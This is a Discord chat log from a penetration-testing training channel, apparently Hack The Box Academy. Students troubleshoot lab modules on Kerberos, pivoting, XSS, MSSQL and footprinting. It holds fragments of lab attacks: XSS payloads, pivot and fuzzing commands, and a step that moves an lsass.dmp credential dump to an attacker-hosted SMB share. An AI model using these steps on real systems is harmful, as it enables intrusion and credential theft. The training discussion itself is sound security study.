#modules

1 messages · Page 132 of 1

thorn urchin
#

smbclient -k

misty current
#

I've had it failing a lot. I completed the kerberos attack skill assessment, and got curious how I'd list the share from linux and tried stuff but no luck.

thorn urchin
#

you can also use kerberos auth with cme

misty current
#

I'm missing something badly perhaps. I can't cme with -k either, it throws me the usual KDC_ERR_S_PRINCIPAL_UNKNOWN on DC and on other machine I get the connection reset by peer.
If anyone's completed the kerberos module, let me know.

#

Have you completed the Kerberos attacks module? @thorn urchin

thorn urchin
#

no

#

that error usually means either that user doesnt exist, you didnt specify the proper FQDN, or your kerberos ticket is bad

misty current
#

I know the user exists and the FQDN isn't a thing with cme. Probably the later, I'll explore more.

sly dome
#

or the service belongs to other forest

thorn urchin
#

its always a thing, kerberos anal as fuck about domain names

misty current
#

No forest involved here.

thorn urchin
#

?

#

forest doesnt matter

sly dome
#

the error means the requested SPN is not in the Global Catalog

misty current
#

I was looking into one of Ipsecs video about this, he faced the exact same issue, but he fixed it just playing around with re-chaining the KRB5CCNAME variable. 🤔

thorn urchin
#

ye cause his kerberos ticket was bad

fathom pendant
#

Which can happen

thorn urchin
#

sometimes you just need to regen the ticket

misty current
#

Hmm, I'll play around more. Thanks everyone~

sly dome
#

For example, an event log 3 about a Kerberos error that has the error code 0x7 KDC_ERR_S_PRINCIPAL_UNKNOWN for Server Name cifs/<IP address> will be logged when a share access is made against a server IP address and no server name. If this error is logged, the Windows client automatically tries to fail back to NTLM authentication for the user account. If this operation works, receive no error.

https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-kerberos-event-logging

This article provides a solution on how to enable Kerberos event logging on a particular machine.

#

found this

rich wraith
#

Shells and Payloads module, Reverse Shell section: This script isnt working

fathom pendant
rich wraith
#

yeah I know, but it writes many syntax errors

analog dock
#

Can also use psexec

thorn urchin
rich wraith
#

oh shit, yeah, I forgot to start the netcat listener , thanks 😄

thorn urchin
#

what

errant hawk
#

So, on my win10 VM I can't install kali linux for WSL because it is saying "please enable the virtual machine platform windows feature and ensure virtualization in the BIOS"

#

How am I supposed to do this on a VM? When using key I only get boot manager for the VM not any bios settings

thorn urchin
#

why are you trying to install a kali vm inside of a windows vm

errant hawk
#

It's part of this info sec foundational stuff

#

It's not the actual VM

#

it's kali linux for WSL

thorn urchin
#

same thing, its still a vm effectively

errant hawk
#

All I am doing is following the guide hack the box lol

#

I don't know shit

#

😄

thorn urchin
#

yeah idk, I havnt done that module

#

so no idea whyd they would want you to install a vm inside a vm

#

thats silly

#

<@&861185840277487616> bot

errant hawk
#

From what I can tell, it's basically so that you can use linux stuff in the windows environment, like they want me to be able to use Bash and chocolatey etc

thorn urchin
#

yeah but you can just install a linux vm

errant hawk
#

Which I have done, in the previous section

#

During Linux fundamentals, I follow it and installed a Parrot OS VM

#

Now during windows fundamentals I installed a win 10 VM and it started asking me to do these things

thorn urchin
#

and it asked you to install a windows VM?

errant hawk
#

"With all this in mind, where do we start? Fortunately for us, there are many new features with Windows that were not available just a few years ago. Windows Subsystem for Linux (WSL) is an excellent example of this. It allows for Linux operating systems to run alongside our Windows install. This can help us by giving us a space to run tools developed for Linux right inside our Windows host without the need for a hypervisor program or installation of a third-party application such as VirtualBox or Docker.

This section will examine and install the core components we will need to get our systems in fighting shape, such as WSL, Visual Studio Code, Python, Git, and the Chocolatey Package Manager. Since we are utilizing this platform to perform penetration test functions, it will also require us to make changes to our host's security settings. Keep in mind, most exploitation tools and code are just that, USED for EXPLOITATION and can be harmful to your host if not careful. Be mindful of what we install and run. If we do not isolate these tools off, Windows Defender will almost certainly delete any detected files and applications it deems harmful, breaking our setup. OK, let us dive in."

thorn urchin
#

That sounds like instructions for a windows host, not necessarily to stack inside a windows vm

errant hawk
#

I thought this to after re-reading but then it litteraly goes from that to installing the windows VM

thorn urchin
#

Personally id ignore it. Either follow the instructions inside a windows host, or skip.

#

Cause installing a vm inside a vm is dumb

#

imo at least

errant hawk
#

I don't get it myself really but I am new to all this, only been in IT since january and as an apprentice on help desk

#

So was just following the guide really

thorn urchin
#

yeah happens. Like I said I didnt do that module so idk if youre misreading it or if it really is just suggesting you do something silly

errant hawk
#

It is one or the other, either way thanks for your 10 cents

#

I am convinced you are right about this being something that should be done on a host

misty current
orchid pine
#

i followed every step

#

i coinfgured the proxy

#

server

#

and i got this

#

module

#

RDP and SOCKS Tunneling with SocksOverRDP

#

im losing my mind

orchid pine
#

and im going crazy with this

thorn urchin
#

that shit never works. Cheat and use it as a chance to practice a diff pivoting method

sly dome
#

can i see your netsh command

orchid pine
#

TCP 127.0.0.1:1080 0.0.0.0:0 LISTENING

thorn urchin
#

<@&861185840277487616> the bot, again.

orchid pine
#

can i try ligolo

#

in thi case

rustic sage
#

i've just started getting into ligolo and i'd recommend it

thorn urchin
rustic sage
#

wish it was covered in the pivoting module

thorn urchin
#

ligolo is still relatively new

#

I could see it getting an addition though with how popular its getting

orchid pine
#

with that qusetiom

#

ill try ligolo

#

i hope it work

novel matrix
orchid pine
#

u guys prefer chisel or ligolo

thorn urchin
#

lul

thorn urchin
orchid pine
#

wish one u guys recommend for me to learn and practice and master

thorn urchin
#

@novel matrix ^

rustic sage
#

lmao

#

you jinxed it

thorn urchin
#

diff guy but amusing timing

dark sandal
#

Who can help me with XSS module?
How do I use the payload i've got from xsstrike?

#

I ran xsstrike.py and found '><a%0doNpOINteREnter+=+a=prompt,a()>v3dm0s as the payload

orchid pine
#

sudo ip tuntap add user nee mode tun ligolo
sudo ip link set ligolo up how can we use this cmnd in windows

rustic sage
orchid pine
#

can i dm you

#

about the sockoevr rdp

wheat garden
#

any one do Linux privilege escalation module section "Logrotate" was able to successfully get this exploit to run? Give me some help

sly dome
#

you usually dont try a revshell with race condition exploits

#

try another approach

dark sandal
sly dome
#

you can even complete it from your mom's PC

#

i mean you do not need any tool to complete the Phishing flag

dark sandal
#

How did u find out the payload to inject js in the url

sly dome
#

inspecting the code

dark sandal
#

Sorry, it's not clear

sly dome
#

its basic HTML tho

#

DM me if u want

wheat garden
sly dome
sly dome
#

how can you escape and inject code?

ornate notch
#

Need a source module brute force admin root on an Android g stylus

dark sandal
ornate notch
#

There's gotta be another way to apply the xsl module

#

Handshake certificate maybe ?

sly dome
dark sandal
#

You are not understanding my question. Thx anyway for helping me out

sly dome
#

'> alert("XSS")

#

try that in the url field

sly dome
#

also the tool returned the correct payload which is '>

#

after that you include your code with script tags

#

since its javascript code

dark sandal
#

Yep I got that
I just trying to undersand the line of the xsstrike output:

"Payload: '><HTmL/+/oNPOIntereNTER%09=%09[8].find(confirm)//"

The thing is I was trying to read that and get the whole line rather than the '>

sly dome
#

if you check the source code of the site (ctrl+u) you will see how your input is reflected and infere how to inject code which leads to '>

sly dome
#

to confirm the code injection and the consequent XSS

dark sandal
#

Ok understood.. ty
I'll inspect the code always thanks Rafa

sly dome
#

from HTmL onwards is not needed

#

there you place your own code

ornate notch
orchid pine
#

Hello guys for anyone who’s doing the module pivoting & forwarding section SockOverrdp

#

and facing this probleme

sly dome
#

i think your tunnel is not properly setup

orchid pine
#

when u cofigure the proxy

#

dont run mstcs.exe from the cmd

#

cuz u will face this problem

sly dome
#

because reason 1 and 2 are not possible here

orchid pine
#

go to the search bar and rdp

#

and run it from there and the probleme will be fixed

orchid pine
#

everthing was set properly

#

i just tried to run rdp from the search bar

sly dome
#

actually weird yea

orchid pine
#

and it worked

#

LOOOOOOOOOOOOOOOOOOl

sly dome
#

can you check what binary does rdp from search bar run?

#

with right click > show in folder maybe

orchid pine
#

the sma e one

sly dome
#

maybe from the cmd it runs with elevated privileges

#

i cant think about anything else

#

just user error xD

#

when i reach that module i will try in my side

orchid pine
#

idk

#

its so weird

#

like for real

#

wasted 6h

#

to fix this

#

XDDDDDD

#

so fking dumb

halcyon idol
#

yo I am doing the same question, did you manage to do it. any hints

#

Hi , i'm doing the WINDOWS EVENT LOGS & FINDING EVIL module (https://academy.hackthebox.com/module/216/section/2303) , and i cant seem to understand the question : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe . Can anybody give me a hint ?

orchid pine
#

anywhere i can prcatice the ligol

#

on windows hosts

#

i want to change my nickname here

#

can an dfamin helpme to achieve this

vital adder
# orchid pine anywhere i can prcatice the ligol

best place is the prolabs but on the academy you can also do it on a few big module like the pivoting or the AD module both module have a lot of chained boxes and you can use those to practice pivoting

vital adder
#

ligolo-ng

halcyon idol
orchid pine
#

ig ill parcitce it

#

on pivoting skill assessement

#

tomorrow

fathom pendant
#

You've obviously missed something

#

You're given that the answer is a *.exe process

halcyon idol
fathom pendant
#

Read the section, they probably give you a syntax to speed thing up

#

I don't have this module unlocked but that's my best guess

#

But you can also try Google if you've really been at it for days

halcyon idol
#

Even this guy could not answer it I literally tried everything in my power

#

🥺

halcyon idol
halcyon idol
frozen mesa
#

The RPD session only gives a black screen, how to solve this? Rebooted the VM's already, restarted the services but nothing else thatn this.

Module: INTRODUCTION TO ACTIVE DIRECTORY --> AD Administration: Guided Lab Part I

frozen mesa
#

So simple, thanks!

quick crane
#

who can help me this modulehttps://academy.hackthebox.com/module/67/section/603.No matter how many times I follow the tutorial, it still fails and I don't know where I went wrong. I'm hoping someone can give me some tips, I'd be very grateful

oak sapphire
#

Good morning.

#

I'm working the LINUX FUNDAMENTALS
Page 12
I'm stuck on the last questions.

I can't get the number of links correct

quick crane
oak sapphire
noble temple
#

hey, i am working on the machine called nibbles in modules hack the box introduction, but the machine keep crashing and bugging "Timeout is exceeded The server at 10.129.213.xxx takes too long to respond. " , i have changed the vpn server, reset many time the box but it keep crashing. any clues ?

lusty thicket
fathom pendant
noble temple
#

yes i am running my vpn on my vps pwn box and also my vpn in my pc browser locally

fathom pendant
#

Don't

#

Running the pwnbox and vpn connection simultaneously causes network collision issues as they are both assigned the same internal ip

noble temple
fathom pendant
#

You don't need to use the browser vm unless you're trying to troubleshoot why a command that looks correct isn't returning an expected result

noble temple
#

now its working well better when i use just one machine and not 2 at the same time thanks

oak sapphire
fathom pendant
oak sapphire
#

Just wanted to say thanks. Didn't know that before

fathom pendant
#

Oh lol

#

Like it makes sense when you realize the pwnbox is natively connected to the vpn network.

tender acorn
#

In the Linux privilege escalation Module.
Section logrotate.

I get a error.

I try a lot around and use different version of the exploit but still the same

fiery berry
# tender acorn

is gcc installed on the target machine? You can directly compile it from there and avoid any dependecies issue

tender acorn
brittle tendon
#

Hi guys, would someone please help me i am stuck with this question : Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get? i ve tried this command : ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:32910 -H 'Host: FUZZ.academy.htb' -fs 900 -v
is it right ?

fathom pendant
#

Is academy.htb in your /etc/hosts

#

Also were you given that port for http/https?

oak sapphire
#

Hello

#

Ned help guys

fathom pendant
#

Just ask your question

oak sapphire
#

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I've donoe this, captured using:
curl -o website_source.html https://www.inlanefreight.com

and filtered using:
grep -o 'https://www\.inlanefreight\.com/[^"]*' website_source.html | sort -u

#

i get a bunch of inaccurate total number of links when i count with wc

#

I need help constructing the filter i think

fathom pendant
#

You put your grep output flag before your actual grep

#

Also sometimes grep doesn't do regex

#

Iirc egrep does but you can just do man grep to see the regex flag

brittle tendon
#

@fathom pendant yes its in /etc/hosts and its the port that they give
the scan returns a lot of subdomains and i dont know what to do

fathom pendant
brittle tendon
#

the expected format is '*. academy.htb' i ve tried with ' and doesnt work

#

@fathom pendant

fathom pendant
#

...take the quotes out

brittle tendon
#

i ve tried still not working i ve tried many option

#

and nothing worked

fathom pendant
#

You said you get multiple outputs

#

Check the hint or reread the question

fathom pendant
#

Your filter looks for a response size of 900, which could be the 404 page

#

Or some other error page

#

Or more accurately filters against size of 900

#

So anything that isn't a 900 size is returned

#

If you're looking for a response of size 900, then you want -ms

oak sapphire
fathom pendant
oak sapphire
#

nothing there

fathom pendant
#

read the section again then ¯_(ツ)_/¯

#

Also are you sure you're getting what you're expecting with your curl command

fathom pendant
oak sapphire
brittle tendon
oak sapphire
#

Or I'm just not counting correctly

#

I think that i just mostly need to fix the regex for clearer filtering

fathom pendant
#

Input the number that the wc command gives and see if it's the answer

#

¯_(ツ)_/¯

oak sapphire
#

never is. sus

#

I want to fight

fathom pendant
#

¯_(ツ)_/¯

oak sapphire
#

I appreciate how hard these challenges are, however I want to advance

fathom pendant
fresh jay
#

does anyone know how to complete the log poisoning lfi

fathom pendant
#

Iirc single quotes and if you fuck it up, you gotta reset the box

fresh jay
#

lirc?

#

thankyou

fathom pendant
#

... iirc stands for "if I recall correctly"

#

It's not a program or script

fathom pendant
#

The amount of people that don't know common acronyms...

fresh jay
#

i only speed queens english

#

speak

#

ooof

#

yes done it

unreal lintel
#

How do I link all my accounts with discord

fresh jay
#

feel like i nearly got to that answer before but the php leaving the log file output threw me off

fresh jay
unreal lintel
#

U know

#

link my insta

#

and yt

#

and stuff like that

fathom pendant
unreal lintel
#

No I just thought U guys could help

#

Oh Sorry!!

fathom pendant
#

Also your question isn't related to the htb platform

novel matrix
#

please keep on topic.

rain briar
#

need some help on the attacking common services sql section please!!!!

rain briar
#

question 2 enum flagDB

#

i have a password for mssqlsvc but cant get anywhewre with it really for enumerating

sly dome
#

well enumerate better

#

cant say more

rain briar
#

lol

vital adder
sly dome
#

im assuming you are logged in

rain briar
#

tried to impersonate too

sly dome
sly dome
#

login with the service account and enumerate the database

#

dont forget to use -windows-auth flag

rain briar
#

i did

#

cant even get in

sly dome
#

that’s different

#

show us your error

vital adder
rain briar
#

i just logged in thats so weird i tried 5x

sly dome
#

you have to login as the service account MRtom

#

and then enumerate the database

#

its a simple exercise

rain briar
#

no idea who that is

#

didnbt see any user in the db with that name

sly dome
#

what dude

#

MRtom is a guy here in the chat

vital adder
rain briar
#

lol

#

thought you were talkign to me

sly dome
#

the htbstudent is to trigger the ntlmv2 hash

#

please try to recall the module before talking

vital adder
#

spoiler but yes he is on the second account which is only a step away from the flag (which is getting it 🤣 )

rain briar
#

i got the hash

vital adder
sly dome
polar skiff
#

hi any hint for Footprinting medium machine im lost

vital adder
#

same lul

rain briar
#

ya

#

ive itried it with mssqlv and sqsh

sly dome
#

he was 1 step from the flag 🤣

vital adder
rain briar
#

mssqlcient

sly dome
#

netntlmv2 are not password hashes

#

i assume you cracked it?

vital adder
rain briar
sly dome
#

connect with mssqlclient

polar skiff
#

i look at the forum that they mount a db but dont know how

vital adder
#

first do some basic enum, try every the module showed base on what server there is on that box

wet skiff
#

Hello 👋

vital adder
fathom pendant
vital adder
#

everything you need is showed in the module

fathom pendant
#

^

#

The nolock option is important

polar skiff
#

i think i will read some parts again

vital adder
#

wlep you got the hint on where to start just go back to that section

vital adder
hallow kiln
#

You're in the wrong server for this crap

brittle gorge
#

Need help regarding Broken Authentication Module -> Broken Cookies -> Question 1

vital adder
#

let me guess need help with the role right?

brittle gorge
#

I was going to write that

#

What is the wisdom here , Mr. Squirrel

novel matrix
#

Hmm

vital adder
brittle gorge
vital adder
vital adder
#

and one of them is right so you may want to remove it 🤣

brittle gorge
#

I am going to kill myself

#

lmao

#

Right infront of my eyes

vital adder
brittle gorge
rain briar
#

need some more help with sql section just need a hint or something

#

been stuck for 6 hours

vital adder
#

which module?

#

and section

rain briar
#

attacking common services sql

#

qurestion 2

vital adder
#

oh still on that on? after logging in did you check ||flagDB|| ?

rain briar
#

how i dont have permission

sly dome
#

with mssql service account you can read the flag

#

im reading it right now

rain briar
#

it doent list show it on my end

sly dome
#

just to test

rain briar
#

flagDB isnt even there

#

ill send you screenshot

vital adder
#

try master.dbo.sysdatabases also all of the command that you need for this last part is under SQL Syntax in that section

sly dome
#

command from sql server documentation

#

or use the provided one in the module

sly dome
#

i suggest you to take a look into sql module

#

here it is shown how information_schema works,

orchid pine
#

hello guys

#

need some help

#

i tried to use ligolo to pivot to an internal network and im facing this probleme

#

ebadmin@inlanefreight:~$ ./agent -connect 10.10.14.8:11601 -ignor-cert
./agent: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./agent) ./agent: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./agent)

rain briar
#

and that module is 10 modules after the one im on...

sly dome
#

ah

#

CBBH > CPTS path (order)

craggy zinc
#

guys is there a way to install responder from ubuntu linux?? (ping me :))

rain briar
#

im still unable to get where i need to unfortunately

sly dome
#

where?

rain briar
#

i typed use flagDB and entered into the database but cant quaery anything its weird

sly dome
rain briar
#

isy go to github and search for impacket

#

i know!!!

#

it literally jsut hangs

sly dome
#

responder is not from impacket

#

reset the machine

craggy zinc
orchid pine
rain briar
#

youre right my bad lol

craggy zinc
# rain briar git clone https://github.com/SpiderLabs/Responder

root@Linuxi:/home/isymbol# git clone https://github.com/SpiderLabs/Responder
fatal: destination path 'Responder' already exists and is not an empty directory.
alr did that 😭

GitHub

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...

rain briar
#

locate respodner

#

locate responder and cd into it

craggy zinc
#

where do git cloned repos go in?

sly dome
rain briar
#

personally i have an uploads folder and spin up a WEBSERVER in the chosen programto transfer it

#

@sly dome all i can do i guess is reset the machinew

#

ive found some of these machines to be very buggy and need constant resets

sly dome
#

ofc try that xD

#

ive never had to

#

but can happen

craggy zinc
#

where do git clones repos go in?

rain briar
#

doing it now ill

tight mesa
#

hello y'all, I'm receiving this error when try to pivot to the 2nd Windows Machine (172.16.6.155) into SockOverRDP lab exercise..!!! any idea what could be happening?

sly dome
#

wait

#

SELECT Distinct TABLE_NAME FROM information_schema.TABLES

#

for example

#

from the module

#

SELECT table_name FROM flagDB.INFORMATION_SCHEMA.TABLES

rain briar
#

i got it

#

it was select * from tb_flag

orchid pine
#

┌──(shadowalker㉿kali)-[~/pivoting/ligolo-ng]
└─$ CGO_ENABLED=0 go build -o agentcompile -ldflags '-extldflags "-static"' ./cmd/agent/main.go

sly dome
#

yes

sly dome
rain briar
#

finally

#

that sucked lol

#

thank you dude

drifting vortex
#

I hope I'm not posting in the wrong are but please let me know.

Question on the Footprinting Pathway in the section of SMB.
I'm trying to answer this question:
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.

I tried looking over this several times and cant see where it instructs me to connect to the share. when I type command "smbclient //sambashare/sambauser -I 10.129.244.188" I get prompted for a password which I do not know. Can I please get some help???

fiery berry
drifting vortex
quartz trail
#

anyone its possible to find ftp exploit on windows 11 machine

#

because i try 2 times

#

and nothing

#

no result's

rustic sage
#

sucks2suck

#

this isn't the place for it

craggy zinc
orchid pine
#

@sly dome

#

└─$ sudo ip route add 172.16.0.0/16 dev ligolo
[sudo] password for shadowalker:

┌──(shadowalker㉿kali)-[~]
└─$ ip route
default via 10.0.2.2 dev eth0 proto dhcp src 10.0.2.15 metric 100
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100
10.10.10.0/23 via 10.10.14.1 dev tun0
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.8
10.129.0.0/16 via 10.10.14.1 dev tun0
172.16.0.0/16 dev ligolo scope link
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown i set up everything

#

still cannot ping the target

sly dome
#

double check everything

#

you have to see in the ligolo-ng proxy the connection

#

also tell ligolo-ng to use that tunnel

orchid pine
#

like everything is set

vital adder
orchid pine
#

the proxy connected to the agent

#

inet 172.16.5.15 netmask 255.255.0.0

vital adder
#

yea the subnet is 172.16.5.0/24 lol

orchid pine
#

tf

vital adder
#

how can there be a 0.0/ network

sly dome
#

if the netmask is 255.255.0.0 the CIDR is /16

orchid pine
#

wait what 255.255 is thge nework and the othger parts are the host no ?

sly dome
#

also stop copy pasting your whole outputs

#

and start sending screenshots

#

of the whole process

#

we are unable to debug your own problem

polar skiff
#

i got a sa user and i cant use his credential for rdp, smb or rpc i dont know what im missing Footprinting Lab - Medium

vital adder
polar skiff
#

i just look that i may use remmina?

vital adder
#

any rdp tools will work fine

craggy zinc
#

admin'# 🥵

polar skiff
lusty thicket
foggy light
#

This module SA was a suffering lol.
couldnt have done it without this patient people @acoustic owl @carmine hill ❤️
Anyone in future need help with this module dm me ❤️

polar skiff
#

remmina worked :V

acoustic owl
drifting vortex
fiery berry
# drifting vortex

I would suggest to look at the "linux fundamentals" module, anyway there is only one directory I can see

lusty thicket
#

and you don’t have access to the entire file system

fathom pendant
foggy light
fiery berry
drifting vortex
#

Thanks @fiery berry and @fathom pendant. I was trying to the head not realising I was already there I know the "D" stands for directory so I thought might as well start at the beggining... Im having a rought day :/

#

But my flag was in Contents so thank you guys!

fathom pendant
#

That's why @fiery berry suggested linux Fundamentals

#

And tbh: the question probably told you it was there, if not it hinted it

#

90% of the time the question tells you where to look

drifting vortex
#

The question was: Connect to the discovered share and find the flag.txt file. Submit the contents as the answer

So your right @fathom pendant. I know where I messed up but I'm too embaressed to talk about that. Ill take the L

snow bay
#

Can I have a talk with sb?

zinc marsh
#

Using Crackmapexec - Password Spraying - Which other account has the STATUS_PASSWORD_MUST_CHANGE flag?

#

is it bugged this question?

#

I only find peter

floral cedar
#

I'm stuck on this question: **When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag. **

I'm stuck on finding the right username and passwordlist. I tried create various usernames list and passwordlists with cupp and username_anarchy, but so far I do not get a hit.

#

Is someone available to point me in the right direction?

floral cedar
#

found the right list

floral cedar
turbid heron
#

I am stuck on this question in the "Introduction to Threat Hunting & Hunting With Elastic" module for a few days. Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer.

#

I have tried to use event code 13 as suggested in the Hint but failing to understand what exactly I am looking for. I am even using the registry. path and registry.value fields but have above 9000 hits to filter.

viscid gulch
#

hey guys I am struggling with a medium lab from the footprinting module

#

these are my findings so far

#
  • Open ports: 111, 135, 139, 445 (RPC), 2049 (NFS), 3389 (RDP), 5985 (WinRM), 47001 (WinRS)

  • Valid credentials obtained:

    • alex/lo.......... (from NFS share file)
    • sa/8......... (from SMB share file - potential SQL credentials)
  • Users identified:

    • alex
    • HTB (target user)
  • Services available:

    • RPC
    • SMB
    • NFS share /TechSupport
    • RDP
    • WinRM
  • Information from RPC enumeration:

    • OS is Windows 10
    • Domain is WINMEDIUM
    • SMB share devshare
  • Information from SMB share devshare:

    • File important.txt contained SQL credentials
  • Information from NFS share:

    • Confirmed alex credentials
    • Indicates web server running at web.dev.inlanefreight.htb
    • References SMTP server smtp.web.dev.inlanefreight.htb
viscid gulch
misty current
#

Does "Security Monitoring & SIEM Fundamentals" module, makes your work on Kibana?

lusty thicket
analog dock
analog dock
turbid heron
#

I am stuck on this question in the "Introduction to Threat Hunting & Hunting With Elastic" module for a few days. Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer.
I have tried to use event code 13 as suggested in the Hint but failing to understand what exactly I am looking for. I am even using the registry. path and registry.value fields but have above 9000 hits to filter.

analog dock
#

What exactly in the registry path?

#

The link gives you the example keys which are default on windows

#

Make a query so that you have event code 13 and the paths it shows covered

orchid pine
#

cansomeone explaine this question

#

i used ligol-ng to connect to the internal network

#

how can i dwonload a file from the intenal network to mu machine

thorn urchin
#

I mean pick your poison?

turbid heron
thorn urchin
#

Use whatever file transfer you want.

#

if you preferred method requires hosting a service to do so, then add a listener to forward the port to your machine(assuming the end machine doesnt just have allowed outbound)

analog dock
#

Got it? @turbid heron

turbid heron
analog dock
#

*SOFTWARE…

#

Run*

vocal needle
#

hola alguna comundad en españo ??

analog dock
vocal needle
#

a ok sorry XD

analog dock
#

👍🏼

#

@turbid heron let me know if you finish

turbid heron
#

I am trying to send a picture just a second

orchid pine
#

like im abit confused

analog dock
#

You need to verify your acc to send pics

thorn urchin
#

ligolo has a listener_add function

analog dock
#

That depends per person I guess

#

Ive heard people struggling with malware analysis though

orchid pine
analog dock
#

Haven’t gotten that far myself, but I’d say the first 4 modules are definitely doable

orchid pine
#

but i want to make an smb c,lient on my attack box

loud sparrow
orchid pine
#

and move the file from the internal ntework

thorn urchin
#

nothing extra needed

#

youd only add a listener if the end box doesnt have outbound to your machine AND you need to host a service(i.e a web server. a smb share, ect) or if you need to double pivot

orchid pine
#

yeah but when im using like move from the windows host

thorn urchin
#

then thats not smbclient

#

smbclient is a specific tool

analog dock
#

And recommend it to those that are more interested in blue side, or want to learn more about it

thorn urchin
#

if you just want to host a smb share

#

then yes, add a listener

turbid heron
#

this is without the registry.path parameter

#

trying different ways for registry.path

orchid pine
#

right

analog dock
#
event.code:13  AND registry.path:*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*
thorn urchin
orchid pine
#

i need to aad a listen on the proxy or the client

#

can i dm you to explain more

thorn urchin
#

no Im at work

orchid pine
#

oh oki

thorn urchin
#

you dont need to worry about proxy or client. just use the ligolo provided functionality

#

it spawns the listener for you

#

honestly its something a lot clearer if you just follow the instructions on the github and try it out and see what happens

orchid pine
#

oki

#

i want to do this

turbid heron
#

Thanks again

thorn urchin
# orchid pine

Sometimes 172.16.5.35 can reach 10.10.14.8 anyways and a listener isnt necessary. If it can't though, then yes a listener is precisely for this situation

sly dome
#

im asking

thorn urchin
sly dome
#

router

thorn urchin
#

(basically outbound tends to be less restricted than inbound)

sly dome
#

but for 172 to reach 10 you need web server acting as a router

#

or am i wrong?

thorn urchin
#

you wouldnt need a web server specifically, but yeah. which is a very safe assumption in the real world

#

remember the 10.0 network is just a lab convenience

sly dome
#

im referring to the screenshot above

#

specifically

thorn urchin
#

in the real world that 10.0 machine is likely to be a public machine running your c2

thorn urchin
sly dome
#

you mean than in real scenarios both networks maybe are connected

#

that we should first try without listeners

thorn urchin
#

and even in a lab because a lab is simulating a real world scenario

sly dome
#

that is a nice tip

#

thanks

#

id just set up a listener w/o trying

thorn urchin
#

You dont necessarily have to try it first, I often just make the listener as well, but it can be convenient sometimes when it doesnt work well

#

theres also side considerations about how in a real network it may look weird if you just keep routing everything through the same workstation on the network

orchid pine
#

smbserver.py -smb2support -port 9001 MyShare /path/to/directory on my attack box
on the internal ntework move lsass.dmp \172.16.5.15:9001\skill
and on the pivot i did this listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:9001 --tcp
but it didnt work

#

what im doing worng

sly dome
#

in the move command you need to”\\”

#

to tell its a network share

#

but otherwise i see@all good

thorn urchin
#

some more modern windows also denies anonymous share access you have to specify a user and password for smbserver

#

also you have to specify MyShare

#

also with ligolo I dont like specifying 127.0.0.1 as it can be kinda wonky sometimes. If im lazy ill just use 0.0.0.0 for both

hazy grotto
#

I keep getting the page is timing out.

orchid pine
# sly dome in the move command you need to”\\\\”

PS C:\Windows\system32> move C:\lsass.dmp \172.16.5.15:9001\skill
move : The network path was not found
At line:1 char:1

  • move C:\lsass.dmp \172.16.5.15:9001\skill
  •   + CategoryInfo          : WriteError: (C:\lsass.dmp:String) [Move-Item], IOException
      + FullyQualifiedErrorId : MoveItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand
sly dome
#

?

orchid pine
sly dome
#

the actual path is MyShare

#

iirc

thorn urchin
#

See the like three other little things I advised

#

big one being the share name

sly dome
#

actually the error is about the path

orchid pine
#

im hosting the smb server on my kali on 10.10.14.8:9001

#

the shre name is skill

sly dome
#

can you mount the net share?

#

like map it

#

like use x: NET_SHARE_HERE

#

if you cannot you need credentials

#

like madf0x said

thorn urchin
#

also while it shouldnt be an issue, if Im gunan host a smbserver I prefer to keep it on 445 because that makes windows more happy

sly dome
#

i think they have had so many vulns and flaws around SMB they just do not let you disable the firewall 🤣

#

only port 445 allowed guys

thorn urchin
#

double bonus is that its slightly more stealthy too because why tf is smb operating on ANY port other than 139/445?

sly dome
#

hey boss why is Tom’s PC sending smb traffic through port 9001?

#

🤣

orchid pine
#

wtf now i cannot add

#

a listener

#

om the agent

#

my god

#

my heads hurt at thi points

#

yo guys

#

ill ask a qusetion it may feel stupid

#

but im not thinking proprly at this point

#

XD

#

can i add a listener on the agent not the proxy

thorn urchin
#

you do not interact with the agent on the agent

orchid pine
#

or i i need to add the listener on the proxy and it will creat a listent automaticly

thorn urchin
#

proxy is honestly a bad name for it

#

I rename mine server

orchid pine
#

the server

#

im feeling dumb actuallt

#

at this point

thorn urchin
#

think of the proxy/server as your command interface/C2 for your pivots

orchid pine
#

i need to go sleep XDD im losing my brain cells

thorn urchin
#

the msfconsole to your meterpreter

slate tapir
#

Why is nc -nv taking long to respond in ids/ips hard lab

tulip dragon
#

why the error i was trying to practice the given commands

meager wren
#

Anybody up?

stray plinth
#

I am!

meager wren
#

on researching i found about root squashing

#

i got stuck in Footprinting skills assessment lab 2

#

i got the nfs share but no luck as there is the permission of nobody user

#

I even mounted the share as root

#

but couldn't open the share

#

Can you provide me any hint or ways that the "nologin" can be bypassed or something related to it?

stray plinth
#

I have not made it to the assessment lab 2 yet. Apologies.

meager wren
#

No worries

thorn urchin
#

you gotta mount and browse as root

meager wren
#

you mean i don't need to mount it as root?

thorn urchin
#

no I said and

meager wren
#

Ohh yeah yeahhh, themkssss, i got it

fathom pendant
#

As was told to you multiple times

hazy grotto
#

Having the same issue.

#

Fixed by using this command sudo bundle install instead of bundle install

muted trail
#

anyone know about this error?
smbclient > get 7-ZipPortable_21.07.paf.exe
